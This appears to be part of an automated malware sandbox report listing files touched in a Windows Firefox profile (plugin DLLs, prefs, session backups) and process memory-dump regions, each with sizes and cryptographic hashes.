e81bfd75e4772e86b02688c133522d7d928ad37814dd890f45d18ba29ad5871b2f23cbeb06bcd44dd1ac0eaed10486e98a77e7f976fcac693c4048fbf1f855df

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\pending_pings\ecbcaf5a-8e76-466a-92b4-8252a6113547

Filesize
982B

MD5
fafe9bb87997f0e6fae6f05b4732cf03

SHA1
2e45bfeafe087293de236119b0487703e2251c3d

SHA256
a07f537ff80329a053345036cf9d5b531468d4e0dac78c35921df7e6b3c51e17

SHA512
db9c50264b144f762a3d7b00c5e67b97007c38a6ba411ccaf8debd838206232dd0cd8a9059911b232a39dcfcd9166b84b968334d78b9057b49a883f40ad8e572

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\prefs-1.js

Filesize
11KB

MD5
d8815eaa170fa08c695ec51bb6b26793

SHA1
115dc45814d2ed1d0e0aec9bcc85eb1f224de209

SHA256
8e50b437172c6c4532ccc7435586345d8c3c3eba253bae9219654dc01f46e106

SHA512
5c6b26403d4bbe4e70149c7844896de0cacfcd1f6e4d73cf4206f2bdede77bc53a3843fcb192adab93d8a11fc396fd19157c6d2480ee850f9b7e1d27100e0b06

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\prefs.js

Filesize
10KB

MD5
64ccb81d7f83a15349ee831976ff3791

SHA1
b46fd9954cef82008f65cf5e13090700bf5150e8

SHA256
838a512eec19b89a259849ba6ddec63955c30f18fa7abbcaa75f27e4482cd416

SHA512
dc2001e6cf98d48daa4ccf979f41ccfac86b194e9a749d2b09fd70ee4fece319cfd3a9f9a48186d338208803df37f7db3cdca7baec5a84576f9d323e5d00592b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\sessionstore-backups\recovery.baklz4

Filesize
1KB

MD5
45fee6d6b32735b40021c31108ff7a30

SHA1
8ae13b2c997ad7820c730834c9fa755a93447c57

SHA256
15488443f79e0dd54ba0f03d689a839287dbcbe6141eb460eae3dd592a29d219

SHA512
0d7d34569e759e84d72d79efc24457205cc90bfb7eb1acb5d765059120d1b8604a6e7434ce898dec087b412e6bcd397bf6a37db240b8c1aa25cde91b2a86f0ba

Download Submit
memory/3352-366-0x00007FFF6CA80000-0x00007FFF6D541000-memory.dmp

Filesize
10.8MB

Download
memory/3352-368-0x00007FFF6CA80000-0x00007FFF6D541000-memory.dmp

Filesize
10.8MB

Download
memory/3352-365-0x00007FFF6CA80000-0x00007FFF6D541000-memory.dmp

Filesize
10.8MB

Download
memory/3352-354-0x00007FFF6CA80000-0x00007FFF6D541000-memory.dmp

Filesize
10.8MB

Download
memory/3596-441-0x00007FFF6CA80000-0x00007FFF6D541000-memory.dmp

Filesize
10.8MB

Download
memory/3596-352-0x00007FFF6CA80000-0x00007FFF6D541000-memory.dmp

Filesize
10.8MB

Download
memory/3596-349-0x000001A2D5660000-0x000001A2D5682000-memory.dmp

Filesize
136KB

Download
memory/3596-339-0x00007FFF6CA83000-0x00007FFF6CA85000-memory.dmp

Filesize
8KB

Download
memory/3708-471-0x000000001D410000-0x000000001D4C2000-memory.dmp

Filesize
712KB

Download
memory/3708-474-0x000000001D350000-0x000000001D362000-memory.dmp

Filesize
72KB

Download
memory/3708-475-0x000000001D3B0000-0x000000001D3EC000-memory.dmp

Filesize
240KB

Download
memory/3708-470-0x000000001D300000-0x000000001D350000-memory.dmp

Filesize
320KB

Download
memory/3920-456-0x0000000000AB0000-0x0000000000DD4000-memory.dmp

Filesize
3.1MB

Download